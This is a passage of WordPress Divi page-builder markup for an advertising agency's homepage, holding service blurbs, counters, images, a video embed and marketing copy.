title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\" hover_enabled=\"0\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||5px|||\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||40px|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Why We\" title_text=\"Why-we\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" hover_enabled=\"0\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\" custom_margin=\"-86px|||||\"]<h2><span>Why choose us?</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"||31px|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p><span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>\n[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/217x434.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" title_text=\"217x434\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"Creative graphic designing\" title_text=\"Creative graphic designing\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\" hover_enabled=\"0\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\" hover_enabled=\"0\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"4.5.2\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" hover_enabled=\"0\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]\n\nLead/Sales Generation Campaign - 77%\n\n[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"4.5.2\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" hover_enabled=\"0\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]\n\nDigital Advertising - 85%\n\n[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\" hover_enabled=\"0\" alt=\"creative services\" title_text=\"creative services\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12-1.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\" alt=\"Best Advertising agency\" title_text=\"best-advertising-agency\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\" hover_enabled=\"0\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" 